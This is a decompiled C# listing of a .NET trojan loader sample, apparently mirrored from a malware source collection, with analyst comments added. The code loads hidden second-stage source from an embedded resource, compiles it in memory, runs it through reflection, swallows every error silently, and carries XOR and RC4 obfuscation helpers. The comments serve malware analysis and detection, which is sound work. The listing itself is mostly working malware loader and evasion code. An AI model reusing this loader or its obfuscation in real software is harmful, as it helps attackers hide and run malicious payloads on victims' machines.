mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-12 13:25:30 +00:00
// Decompiled with JetBrains decompiler
// Type: IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ
// Assembly: MediaCenter, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9606FA2A-F02F-46D3-BFDE-BA7924614AB7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Llac.aacw-3c63882d1ca9dd6051c6236c3fd9e399b052b3b7c53a5a45527222968696881e.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Text;
// Analyst notes (decompiled sample, identifiers are obfuscated):
//   * Main reads the assembly's first embedded manifest resource as text, substitutes the
//     running executable's path for the "__PATH__" placeholder, compiles that text as
//     Visual Basic with CodeDom (GenerateInMemory = true) and calls one public static
//     method of the compiled type through late-bound reflection.
//   * The second-stage source is not part of this listing; it lives in the embedded resource.
//   * Every exception on the compile/invoke path is swallowed unless the debug flag below is
//     set, so a failed run leaves no visible error.
//   * The type and method names passed as string literals look randomly generated
//     (presumably per build - confirm against sibling samples), so they make brittle
//     signatures. The behaviour (embedded resource -> CodeDom compile -> reflective invoke)
//     is the more durable thing to match on.
//   * NOTE(review): on .NET Framework the CodeDom providers normally run the command-line
//     compiler and use temporary files even when GenerateInMemory is true, so a compiler
//     child process started by an unrelated executable is a useful telemetry point -
//     confirm in sandbox output.
//   * Several locals are read before assignment (compilerResults, str, index3). That is a
//     decompiler artifact of VB semantics; the listing is not expected to compile as-is.
[StandardModule]
internal sealed class IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ
{
  // Gate for the MsgBox calls below. It is initialised to false and nothing in this listing
  // assigns it, so the message boxes never appear here.
  private static bool UXOnDufNPkNRfpKYLxYutWDVHLkLWQifCYwokwNcxluSNqsZty = false;

  /// <summary>
  /// Entry point: loads the embedded source text, patches the "__PATH__" placeholder with
  /// this assembly's location, then hands the text and a hard-coded type name to the
  /// compile-and-invoke routine.
  /// </summary>
  [STAThread]
  public static void Main()
  {
    if (IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ.UXOnDufNPkNRfpKYLxYutWDVHLkLWQifCYwokwNcxluSNqsZty)
    {
      int num = (int) Interaction.MsgBox((object) "BNesBCLidHJpvPXNsnomrcjqHhhwnphHjOMtiDtkxJrqeeGOaD");
    }
    // Name of the type looked up in the compiled assembly (see GetType in the callee).
    string IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQName = "vyqPeXIprMotHRmznZBXWxfwimNnys";
    // The placeholder is matched with its surrounding quotes, so the second stage receives
    // the on-disk path of this executable as a quoted string literal.
    IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ.vVgaspNiHzvHYmIvGdYBDjEJRHmvvuzWdkPcbruxpOdWGoqLns(IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ.CYwokwNcxluSNqsZtyHwckljoMTaFRRgkneETMvdgBdhvrboOO().Replace("\"__PATH__\"", "\"" + Assembly.GetExecutingAssembly().Location + "\""), IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQName);
  }

  /// <summary>
  /// Returns the full text of the first manifest resource of the executing assembly, or an
  /// empty string when the resource stream cannot be opened.
  /// </summary>
  /// <returns>The resource content read as text; "" if the stream is null.</returns>
  public static string CYwokwNcxluSNqsZtyHwckljoMTaFRRgkneETMvdgBdhvrboOO()
  {
    Assembly executingAssembly = Assembly.GetExecutingAssembly();
    // Index 0 is used unconditionally; an assembly with no resources would throw here.
    string manifestResourceName = executingAssembly.GetManifestResourceNames()[0];
    Stream manifestResourceStream = executingAssembly.GetManifestResourceStream(manifestResourceName);
    // The StreamReader is never disposed.
    return manifestResourceStream == null ? "" : new StreamReader(manifestResourceStream).ReadToEnd();
  }

  /// <summary>
  /// Compiles the given source text with the Visual Basic CodeDom provider as a library
  /// (GenerateExecutable = false) that references System.dll, System.Windows.Forms.dll,
  /// System.Data.dll and Microsoft.VisualBasic.dll.
  /// </summary>
  /// <param name="mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX">Compiler options prepared by the caller; mutated here.</param>
  /// <param name="oDLMWtoSTzHZhXDxywCntBRsrIxBrRtZXFtOEuJTCCooQYlNhM">Source text to compile.</param>
  /// <returns>The CodeDom compiler results.</returns>
  private static CompilerResults ZxNGpXauXbpzViVIjGEgOfRVvVgaspNiHzvHYmIvGdYBDjEJRH(
    CompilerParameters mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX,
    string oDLMWtoSTzHZhXDxywCntBRsrIxBrRtZXFtOEuJTCCooQYlNhM)
  {
    // Not assigned on the exception path - decompiler artifact; presumably null there in the
    // original VB.
    CompilerResults compilerResults;
    try
    {
      VBCodeProvider vbCodeProvider = new VBCodeProvider();
      mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX.GenerateExecutable = false;
      mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX.ReferencedAssemblies.Add("System.dll");
      mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX.ReferencedAssemblies.Add("System.Windows.Forms.dll");
      mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX.ReferencedAssemblies.Add("System.Data.dll");
      mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll");
      compilerResults = vbCodeProvider.CompileAssemblyFromSource(mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX, oDLMWtoSTzHZhXDxywCntBRsrIxBrRtZXFtOEuJTCCooQYlNhM);
    }
    catch (Exception ex)
    {
      // VB-style error bookkeeping; the exception is swallowed, and its message is shown
      // only when the debug flag is set.
      ProjectData.SetProjectError(ex);
      Exception exception = ex;
      if (IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ.UXOnDufNPkNRfpKYLxYutWDVHLkLWQifCYwokwNcxluSNqsZty)
      {
        int num = (int) Interaction.MsgBox((object) exception.Message);
      }
      ProjectData.ClearProjectError();
    }
    return compilerResults;
  }

  /// <summary>
  /// Builds in-memory compiler options, compiles the source, looks up the named type in the
  /// compiled assembly and passes it to the late-bound invoker. All exceptions are swallowed.
  /// </summary>
  /// <param name="IYceWvYDniXriZmxgfTFgDPdLcOTsgeYqnKgFKHSVkGHQaVyOh">Source text to compile.</param>
  /// <param name="IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQName">Name of the type to fetch from the compiled assembly.</param>
  private static void vVgaspNiHzvHYmIvGdYBDjEJRHmvvuzWdkPcbruxpOdWGoqLns(
    string IYceWvYDniXriZmxgfTFgDPdLcOTsgeYqnKgFKHSVkGHQaVyOh,
    string IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQName)
  {
    CompilerParameters mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX = new CompilerParameters();
    // No output assembly path is requested and no debug information is emitted.
    mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX.GenerateInMemory = true;
    mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX.IncludeDebugInformation = false;
    mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX.TreatWarningsAsErrors = false;
    try
    {
      // compile -> CompiledAssembly -> GetType(name) -> reflective invoke, in one expression.
      IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ.DcrkUCEZCGUQyNmmNWiLeKhzZzLFXHdNXdZlDRZajHCfhOUnvl((object) IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ.ZxNGpXauXbpzViVIjGEgOfRVvVgaspNiHzvHYmIvGdYBDjEJRH(mvvuzWdkPcbruxpOdWGoqLnsGDlyYYzIVwQvUlMlwqJsPyKQMX, IYceWvYDniXriZmxgfTFgDPdLcOTsgeYqnKgFKHSVkGHQaVyOh).CompiledAssembly.GetType(IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQName));
    }
    catch (Exception ex)
    {
      // Same swallow-unless-debug pattern as in the compile routine.
      ProjectData.SetProjectError(ex);
      Exception exception = ex;
      if (IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ.UXOnDufNPkNRfpKYLxYutWDVHLkLWQifCYwokwNcxluSNqsZty)
      {
        int num = (int) Interaction.MsgBox((object) exception.Message);
      }
      ProjectData.ClearProjectError();
    }
  }

  /// <summary>
  /// Late-bound call of "InvokeMember" on the supplied object with the arguments
  /// (method name, Static | Public | InvokeMethod, null, null, null). The only caller in
  /// this listing passes the result of Assembly.GetType, so this amounts to invoking a
  /// public static, parameterless method by name on the compiled type.
  /// </summary>
  /// <param name="kpEOiwjWwTSubsfjJjuoHEawVNJVlBWKTqlPRxSXfUBJKINkry">Object on which "InvokeMember" is called.</param>
  private static void DcrkUCEZCGUQyNmmNWiLeKhzZzLFXHdNXdZlDRZajHCfhOUnvl(
    object kpEOiwjWwTSubsfjJjuoHEawVNJVlBWKTqlPRxSXfUBJKINkry)
  {
    BindingFlags bindingFlags1 = BindingFlags.Static | BindingFlags.Public | BindingFlags.InvokeMethod;
    object Instance = kpEOiwjWwTSubsfjJjuoHEawVNJVlBWKTqlPRxSXfUBJKINkry;
    object[] objArray = new object[5]
    {
      // Name of the method to invoke in the compiled type.
      (object) "LIezZRNYpFaOXupTVCVbjYENOMRouC",
      (object) bindingFlags1,
      (object) null,
      (object) null,
      (object) null
    };
    object[] Arguments = objArray;
    bool[] flagArray = new bool[5]
    {
      false,
      true,
      false,
      false,
      false
    };
    bool[] CopyBack = flagArray;
    // The final 'true' asks the late binder to ignore the return value.
    NewLateBinding.LateCall(Instance, (Type) null, "InvokeMember", Arguments, (string[]) null, (Type[]) null, CopyBack, true);
    // Copy-back handling emitted for VB late binding; bindingFlags2 is never used.
    if (!flagArray[1])
      return;
    BindingFlags bindingFlags2 = (BindingFlags) Conversions.ChangeType(RuntimeHelpers.GetObjectValue(objArray[1]), typeof (BindingFlags));
  }

  // String and byte-array obfuscation helpers: a repeating-key XOR with hex encoding, and
  // RC4. No caller of these methods is visible in this listing.
  public class LUVTYJDKnBzQUXOnDufNPkNRfpKYLxYutWDVHLkLWQifCYwokw
  {
    /// <summary>
    /// Encodes a string: each character code is XORed with a key character code and written
    /// as two hex digits (a single digit is left-padded with "0").
    /// </summary>
    /// <param name="DataIn">Text to encode.</param>
    /// <param name="CodeKey">Repeating key; an empty key makes the modulo below divide by zero.</param>
    /// <returns>Concatenated hex pairs.</returns>
    public static string bTElnIkpEOiwjWwTSubsfjTtFyROlHfXUfwLgUdCwZbIchpfLU(
      string DataIn,
      string CodeKey)
    {
      long num = (long) Strings.Len(DataIn);
      long Start = 1;
      // Read before assignment - decompiler artifact; presumably starts as Nothing/empty in
      // the original VB.
      string str;
      while (Start <= num)
      {
        // Positions are 1-based (Strings.Mid). The key position is (Start % keyLength) + 1,
        // so for keys longer than one character the first data character pairs with the
        // second key character.
        // NOTE(review): Asc works on code-page character codes; when re-implementing the
        // decoder for analysis, expect results to depend on the ANSI code page for
        // non-ASCII data - confirm.
        string Expression = Conversion.Hex(Strings.Asc(Strings.Mid(DataIn, checked ((int) Start), 1)) ^ Strings.Asc(Strings.Mid(CodeKey, checked ((int) (unchecked (Start % (long) Strings.Len(CodeKey)) + 1L)), 1)));
        if (Strings.Len(Expression) == 1)
          Expression = "0" + Expression;
        str += Expression;
        checked { ++Start; }
      }
      return str;
    }

    /// <summary>
    /// Decodes the hex-pair format produced by the string encoder above: each pair is parsed
    /// as a hex value, XORed with the same key schedule and converted back to a character.
    /// </summary>
    /// <param name="DataIn">Hex-pair text.</param>
    /// <param name="CodeKey">Repeating key used for encoding.</param>
    /// <returns>The decoded text.</returns>
    public static string NcxluSNqsZtyHwckljoMTaFRRgkneETMvdgBdhvrboOOoxKmGl(
      string DataIn,
      string CodeKey)
    {
      // Number of pairs = Round(length / 2); odd-length input is not handled specially.
      long num1 = checked ((long) Math.Round(unchecked ((double) Strings.Len(DataIn) / 2.0)));
      long num2 = 1;
      // Read before assignment - decompiler artifact, as in the encoder.
      string str;
      while (num2 <= num1)
      {
        // "&H" prefix makes Val parse the two characters as hexadecimal.
        int num3 = checked ((int) Math.Round(Conversion.Val("&H" + Strings.Mid(DataIn, (int) (2L * num2 - 1L), 2))));
        // Same 1-based, shifted-by-one key position as the encoder.
        int num4 = Strings.Asc(Strings.Mid(CodeKey, checked ((int) (unchecked (num2 % (long) Strings.Len(CodeKey)) + 1L)), 1));
        str += Conversions.ToString(Strings.Chr(num3 ^ num4));
        checked { ++num2; }
      }
      return str;
    }

    /// <summary>
    /// Byte-array overload: applies RC4 to the input, using the key string's bytes under
    /// Encoding.Default.
    /// </summary>
    /// <param name="Input">Bytes to transform.</param>
    /// <param name="Key">Key text.</param>
    /// <returns>A new array of the same length as the input.</returns>
    public static byte[] bTElnIkpEOiwjWwTSubsfjTtFyROlHfXUfwLgUdCwZbIchpfLU(
      byte[] Input,
      string Key)
    {
      // NOTE(review): Encoding.Default is environment dependent, so key bytes for non-ASCII
      // keys can differ between the original host and an analysis machine - confirm.
      return IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ.LUVTYJDKnBzQUXOnDufNPkNRfpKYLxYutWDVHLkLWQifCYwokw.Proper_RC4(Input, Encoding.Default.GetBytes(Key));
    }

    /// <summary>
    /// Byte-array counterpart of the overload above; it simply calls that overload, since
    /// the same keystream XOR both applies and removes the transformation.
    /// </summary>
    /// <param name="Input">Bytes to transform.</param>
    /// <param name="Key">Key text.</param>
    /// <returns>A new array of the same length as the input.</returns>
    public static byte[] NcxluSNqsZtyHwckljoMTaFRRgkneETMvdgBdhvrboOOoxKmGl(
      byte[] Input,
      string Key)
    {
      return IHuhIeqFmEquUIGzSPlIgmitwMhisCwapJdvqfLUVTYJDKnBzQ.LUVTYJDKnBzQUXOnDufNPkNRfpKYLxYutWDVHLkLWQifCYwokw.bTElnIkpEOiwjWwTSubsfjTtFyROlHfXUfwLgUdCwZbIchpfLU(Input, Key);
    }

    /// <summary>
    /// RC4-shaped stream transform: a 256-entry state table is initialised to 0..255,
    /// permuted under the key, then used to generate one keystream value per input byte,
    /// which is XORed into the output.
    /// </summary>
    /// <param name="Input">Bytes to transform.</param>
    /// <param name="Key">Key bytes, indexed modulo their length during table setup.</param>
    /// <returns>A new array of the same length as the input.</returns>
    public static byte[] Proper_RC4(byte[] Input, byte[] Key)
    {
      uint[] numArray1 = new uint[256];
      // Output buffer has exactly Input.Length elements (the -1 + 1 is a VB array-bound idiom).
      byte[] numArray2 = new byte[checked (Input.Length - 1 + 1)];
      // Identity initialisation of the state table.
      uint index1 = 0;
      do
      {
        numArray1[checked ((int) index1)] = index1;
        checked { ++index1; }
      }
      while (index1 <= (uint) byte.MaxValue);
      // Key-dependent permutation of the state table.
      uint index2 = 0;
      do
      {
        // index3 is declared in terms of itself - decompiler artifact; presumably a running
        // accumulator that starts at 0 and persists across iterations in the original.
        uint index3 = checked ((uint) ((long) (index3 + (uint) Key[(int) unchecked ((long) index2 % (long) Key.Length)] + numArray1[(int) index2]) & (long) byte.MaxValue));
        uint num = numArray1[checked ((int) index2)];
        numArray1[checked ((int) index2)] = numArray1[checked ((int) index3)];
        numArray1[checked ((int) index3)] = num;
        checked { ++index2; }
      }
      while (index2 <= (uint) byte.MaxValue);
      // Keystream generation and XOR, one input byte per iteration.
      uint index4 = 0;
      uint index5 = 0;
      int num1 = checked (numArray2.Length - 1);
      int index6 = 0;
      while (index6 <= num1)
      {
        index4 = checked ((uint) ((long) index4 + 1L & (long) byte.MaxValue));
        index5 = checked ((uint) ((long) (index5 + numArray1[(int) index4]) & (long) byte.MaxValue));
        // Swap the two state entries before deriving the keystream value.
        uint num2 = numArray1[checked ((int) index4)];
        numArray1[checked ((int) index4)] = numArray1[checked ((int) index5)];
        numArray1[checked ((int) index5)] = num2;
        numArray2[index6] = checked ((byte) ((int) Input[index6] ^ unchecked ((int) numArray1[checked ((int) ((long) (numArray1[(int) index4] + numArray1[(int) index5]) & (long) byte.MaxValue))])));
        checked { ++index6; }
      }
      return numArray2;
    }
  }
}